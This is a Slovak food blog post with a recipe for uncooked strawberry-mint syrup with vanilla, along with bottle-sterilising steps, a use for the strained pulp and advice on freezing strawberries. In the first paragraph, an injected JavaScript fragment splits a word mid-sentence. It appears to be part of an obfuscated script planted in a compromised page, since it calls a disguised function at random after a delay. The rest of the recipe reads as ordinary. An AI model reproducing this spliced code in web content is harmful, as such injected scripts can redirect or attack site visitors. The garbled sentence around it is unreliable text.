Nevarený jahodovo-mätový sirup s vanilkou

Akurát pozerám na hodiny a ukazujú mi 2 hodiny po polnoci. Zajtra (teda dnes) ma od rána čaká jedno nakrúcanie až do večera a potom šup pobaliť sa a vyraziť na našu milovanú Mallorcu! No ale keďže ja a jahody sme jedno telo a jedna duša, musela som pred dovolenkou ešte vytiahnuť môjho milovaného na samozber jahôd. Nikdy predtým som nič podobné neabsolvovala, tak som sa veľmi tešila. Miuška už je veľká slečna, takže to s nami mohla v pohodičke celé absolvovať a veruže to boli 3 hodiny plné srandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andy a jahodovej šťavy úúúplne všade a na všetkom 😀 😀

OLYMPUS DIGITAL CAMERA

Minulý rok sme jahôdky dostali od Martinovej maminky, ktorá ich pre nás vlastnopaprčne nazbierala a robila som nevarený jahodový sirup. A keďže som to ako vždy, zase robila od oka, nič som si nezapísala, ale pamäť mi ešte celkom slúži a teda aspoň postup som si zapamätala a od včera procedúúrujem 😀 Minulý rok mi ten nevarený sirup vydržal asi 1,5 mesiaca v chladničke. Urobila som len testovaciu jednu fľašu, ostatné som sterilizovala, ale na moje prekvapenie bol ten nevarený sirup dlho predlho voňavučký a chutný a potom sa vlastne ani nezačal kaziť, ale bublinkovať akokeby a robila sa z neho bublinková limonáda 😀 😀 Ale to už sme nepili pre istotu.

Jedna veľká chyba minulého roku bola, že som situp nalievala  do litrových, alebo 1,5 litrových fliaš a teda fľaša bola dlho otvorená a náchylnejšia na pokazenie. Možno, keby som mala ten nevarený sirup v dvoch pollitrových, vydržal by dlhšie.

No ale už vám nebudem zdržovať zbytočným vypisovaním, poďme na to 🙂

Ingrediencie

  • 2700 g umytých čerstvých jahôd (toľko som mala ja, množsto je samozrejme na každom)
  • 200 ml šťavy z bio citrónov (cca 4-5 ks)
  • 15-20 g čerstvej mäty
  • 2 kl mletej sušenej bourbon vanilky (odporúčam z DMky, majú v bio kvalite)
  • 1 kg trstinového nerafinovaného cukru

OLYMPUS DIGITAL CAMERA

Postup

  1. Jahody poriadne preberieme a vyberáme iba nepoškodené kusy. Nahnité, či plesnivé (aj keby len trošku) nekompromisne vyhadzujeme!!! Umyjeme ich, zasypeme cukrom, zalejeme citrónovou šťavou, pridáme mletú vanilku a umytú mätu, ktorú sme trošku pošúchali v rukách a poriadne umytými rukami poroztláčame všetky jahody, aby nám pekne pustili šťavu. Necháme v sklenej mise, alebo veľkom pohári zakryté odpočívať v CHLADNIČKE asi 24 hodín.
  2. Na druhý deň jahody scedíme cez sitko a poriadne popritláčame polievkovou lyžicou, aby sme vytlačili všetkú šťavu. Nepasírujeme 😉 Len jemne vytláčame v sitku šťavu.
  3. V ďalšom kroku poriadne saponátom poumývajte fľaše, alebo použite umývačku riadu. Dajte si zovrieť vodu s trochou octu, a ponalievajte do umytých fliaš. Nechajte chvíľu postáť, vylejte, vypláchnite horúcou vodou z kohútika a môžete plniť jahodovou šťavou.
  4. Upozorňujem, že treba prehnane klásť dôraz na hygienu a čistotu. Octovou vodou z fliaš prelejte aj naberačku, aj lievik, proste všetko úplne čo najsterilnejšie. Rukami nechytajte otvor na fľaši a ani „štuplík“ a nech vám ani nenapadne pchať prsty do šťavy a oblizovať si ich 😉 Ak sa vám stane, že trošku kvapnete zo sirupu na okraj hrdla fľaše, vezmite gázu, utrite, suchú gázu namočte do alkoholu, alebo octu a znovu pretrite „inkriminované“ miesta a poriadne zatvorte 😉
  5. Ja si vždy robím aj varený a aj nevarený, aby mi dlhšie vydržal. Varený robím tak, že v hrnci šťavu zohrejem na 80 stupňov a sterilizujem na tejto teplote asi 10 minút a horúce plním do fliaš. Nabudúce ale asi najprv pozbieram penu pred plnením, lebo vo fľaši to nejak čudne vyzerá, ale možno to je len chybička krásy, uvidím, čo to urobí do rána. Nepamätám si ale, že by som s tým minulý rok mala nejaké problémy 😀
  6. Necháme vychladnúť a šup s nimi do chladničky. Ja v nej uchovávam všetky sirupy, keďže nepoužívam žiadny konzervant a ani cukru nedávam až toľko, ako sa zvykne. Istotka je istotka 😉 Ešte sa mi tfuj tfuj tfuj nič nepokazilo zatiaľ. Iba, keď sme mali sirup už dlho otvorený v tej velikááánskej fľaši. Verím, že aj tento rok som mala všetko poriadne sterilné a vydržia mi až do jesene. Veď nie je nič krajšie, ako si otvoriť jahodový sirup a pripomenúť si leto.
  7. Ešte nekončíííme. Zostali nám jahody po precedení, však? 😀 Tak šup s nimi do hrnca, rozmixovať, priviesť na 80 stupňovú teplotu a asi 5-10 minút nechať jemnučko bublať a plniť do pohárikov, ktoré si prešli rovnako „náročným“ procesom očisty ako fľaše. Viečka ale dáme variť a na poháriky ich dávame ešte horúce a zaťahujeme utierkou. Uložíme do deky a necháme vychladnúť. Tiež ich skladujem v chladničke a používam výlučne do koláčov, muffinov namiesto jablkového pyré. Mňam 😀 Recept hodím hneď po dovolenke. Zatiaľ len pekne šup na polia, pooberať si a odložiť na horšie časy.
  8. Jeden „šuflík“ v mrazničke mám plný jahôd. Jahodám iba odrežem končeky a NEUMYTÉ ich jemne vkladám do opakovane uzatvárateľných vrecúšok a šupnem do mrazničky. Minulý rok mi vydržali do decembra 😀 Takto zamrazené jahody chutia po rozmrazení ako čerstvé. Čestné pionierske 😉 Len ich neumývajte, aby sa vám nepolepili na jednu veľkú guču a mohli ste si vyberať koľko kúskov potrebujete.  😉

 

No nič, idem ja spať, lebo už ledva kukučkujem. Snáď vám môj sirup bude chutiť a želám krásne leto 😀

PS: fotila som v mojej „super“ osvetlenej kuchyni v noci o druhej, takže farba je krajšia, ako na obrázku 😀

Ohodnoť Recept

2 komentáre

  1. Pingback: Najlepšie jahodové pyré a sirup z košíka jahôd :) - Lenivá Kuchárka

  2. Pingback: Levanduľový sirup – Navarím s Úsmevom :)

Napíš Koment